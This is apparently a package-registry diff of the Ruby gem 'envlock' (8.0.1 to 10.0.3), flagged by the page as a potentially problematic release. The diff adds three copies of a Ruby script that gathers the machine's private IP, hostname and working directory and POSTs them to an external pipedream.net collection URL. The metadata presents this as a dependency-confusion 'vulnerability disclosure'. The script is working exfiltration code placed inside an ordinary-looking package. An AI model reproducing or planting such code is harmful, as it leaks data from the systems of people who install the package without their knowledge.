envlock 8.0.1 → 10.0.3
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of envlock might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/bin/console +14 -0
- data/bin/myrubyfile/myrubyfile.rb +26 -0
- data/bin/myrubyfile.rb +26 -0
- data/bin/setup +8 -0
- data/lib/envlock/version.rb +3 -0
- data/lib/myrubyfile.rb +26 -0
- metadata +20 -13
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: fcea77848c800c1574456e88ed97b8b7b5b056066e7c4eb0a1ca6a07165d9e2d
|
4
|
+
data.tar.gz: a4b2fcd11178c17a82d0c0b981ff8b06daea3bbc91eb45bc0e55f1ceebe5f6e2
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: d4bd64da59849aaaaf0dd76ae15575577c8b83bc58d9cb445f4b57b4213313663e0e6f8f6cc9f8379d4b34762ab5be0ad00b471d4406639026fe7f9784ff3143
|
7
|
+
data.tar.gz: 211949dce091f07f904138b5ebbc54921174be8f5e35863ba2a0c25a3b5a075f96a7918a26a680888cbac9aa74414ed76744a018077e6d993d8439f160ca0868
|
data/bin/console
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
#!/usr/bin/env ruby
|
2
|
+
|
3
|
+
require "bundler/setup"
|
4
|
+
require "envlock"
|
5
|
+
|
6
|
+
# You can add fixtures and/or initialization code here to make experimenting
|
7
|
+
# with your gem easier. You can also use a different console, if you like.
|
8
|
+
|
9
|
+
# (If you use this, don't forget to add pry to your Gemfile!)
|
10
|
+
# require "pry"
|
11
|
+
# Pry.start
|
12
|
+
|
13
|
+
require "irb"
|
14
|
+
IRB.start(__FILE__)
|
@@ -0,0 +1,26 @@
|
|
1
|
+
require 'json'
|
2
|
+
require 'net/http'
|
3
|
+
require 'socket'
|
4
|
+
|
5
|
+
#Private IP
|
6
|
+
privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1);
|
7
|
+
s.addr.last}
|
8
|
+
#Hostname
|
9
|
+
hostname = Socket.gethostname
|
10
|
+
#Current directory
|
11
|
+
dir = Dir.pwd
|
12
|
+
|
13
|
+
#Pubcli bin url:- https://pipedream.com OR burpCollaborate url
|
14
|
+
uri = URI('https://eox7hb9vmzgf94.m.pipedream.net')
|
15
|
+
req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
|
16
|
+
|
17
|
+
req.body = {
|
18
|
+
private_ip: privip,
|
19
|
+
hostname: hostname,
|
20
|
+
current_directory: dir
|
21
|
+
}.to_json
|
22
|
+
|
23
|
+
Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme ==
|
24
|
+
'https') do |http|
|
25
|
+
http.request(req)
|
26
|
+
end
|
data/bin/myrubyfile.rb
ADDED
@@ -0,0 +1,26 @@
|
|
1
|
+
require 'json'
|
2
|
+
require 'net/http'
|
3
|
+
require 'socket'
|
4
|
+
|
5
|
+
#Private IP
|
6
|
+
privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1);
|
7
|
+
s.addr.last}
|
8
|
+
#Hostname
|
9
|
+
hostname = Socket.gethostname
|
10
|
+
#Current directory
|
11
|
+
dir = Dir.pwd
|
12
|
+
|
13
|
+
#Pubcli bin url:- https://pipedream.com OR burpCollaborate url
|
14
|
+
uri = URI('https://eox7hb9vmzgf94.m.pipedream.net')
|
15
|
+
req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
|
16
|
+
|
17
|
+
req.body = {
|
18
|
+
private_ip: privip,
|
19
|
+
hostname: hostname,
|
20
|
+
current_directory: dir
|
21
|
+
}.to_json
|
22
|
+
|
23
|
+
Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme ==
|
24
|
+
'https') do |http|
|
25
|
+
http.request(req)
|
26
|
+
end
|
data/bin/setup
ADDED
data/lib/myrubyfile.rb
ADDED
@@ -0,0 +1,26 @@
|
|
1
|
+
require 'json'
|
2
|
+
require 'net/http'
|
3
|
+
require 'socket'
|
4
|
+
|
5
|
+
#Private IP
|
6
|
+
privip = UDPSocket.open {|s| s.connect("64.233.187.99", 1);
|
7
|
+
s.addr.last}
|
8
|
+
#Hostname
|
9
|
+
hostname = Socket.gethostname
|
10
|
+
#Current directory
|
11
|
+
dir = Dir.pwd
|
12
|
+
|
13
|
+
#Pubcli bin url:- https://pipedream.com OR burpCollaborate url
|
14
|
+
uri = URI('https://eox7hb9vmzgf94.m.pipedream.net')
|
15
|
+
req = Net::HTTP::Post.new(uri, 'Content-Type' => 'application/json')
|
16
|
+
|
17
|
+
req.body = {
|
18
|
+
private_ip: privip,
|
19
|
+
hostname: hostname,
|
20
|
+
current_directory: dir
|
21
|
+
}.to_json
|
22
|
+
|
23
|
+
Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme ==
|
24
|
+
'https') do |http|
|
25
|
+
http.request(req)
|
26
|
+
end
|
metadata
CHANGED
@@ -1,26 +1,33 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: envlock
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version:
|
4
|
+
version: 10.0.3
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
|
-
-
|
8
|
-
autorequire:
|
7
|
+
- Naveen kumawat
|
8
|
+
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2023-07-
|
11
|
+
date: 2023-07-14 00:00:00.000000000 Z
|
12
12
|
dependencies: []
|
13
|
-
description:
|
13
|
+
description: This Ruby package vulnerable to dependency confiuse vulnerability
|
14
14
|
email:
|
15
|
-
-
|
15
|
+
- nvkattacker@gmail.com
|
16
16
|
executables: []
|
17
17
|
extensions: []
|
18
18
|
extra_rdoc_files: []
|
19
|
-
files:
|
20
|
-
|
21
|
-
|
19
|
+
files:
|
20
|
+
- bin/console
|
21
|
+
- bin/myrubyfile.rb
|
22
|
+
- bin/myrubyfile/myrubyfile.rb
|
23
|
+
- bin/setup
|
24
|
+
- lib/envlock/version.rb
|
25
|
+
- lib/myrubyfile.rb
|
26
|
+
homepage: https://rubygems.org/gems/envlock
|
27
|
+
licenses:
|
28
|
+
- MIT
|
22
29
|
metadata: {}
|
23
|
-
post_install_message:
|
30
|
+
post_install_message:
|
24
31
|
rdoc_options: []
|
25
32
|
require_paths:
|
26
33
|
- lib
|
@@ -35,8 +42,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
35
42
|
- !ruby/object:Gem::Version
|
36
43
|
version: '0'
|
37
44
|
requirements: []
|
38
|
-
rubygems_version: 3.
|
39
|
-
signing_key:
|
45
|
+
rubygems_version: 3.4.10
|
46
|
+
signing_key:
|
40
47
|
specification_version: 4
|
41
|
-
summary:
|
48
|
+
summary: 'Vulnerability Disclosure: Dependency confiuse vulnerability'
|
42
49
|
test_files: []
|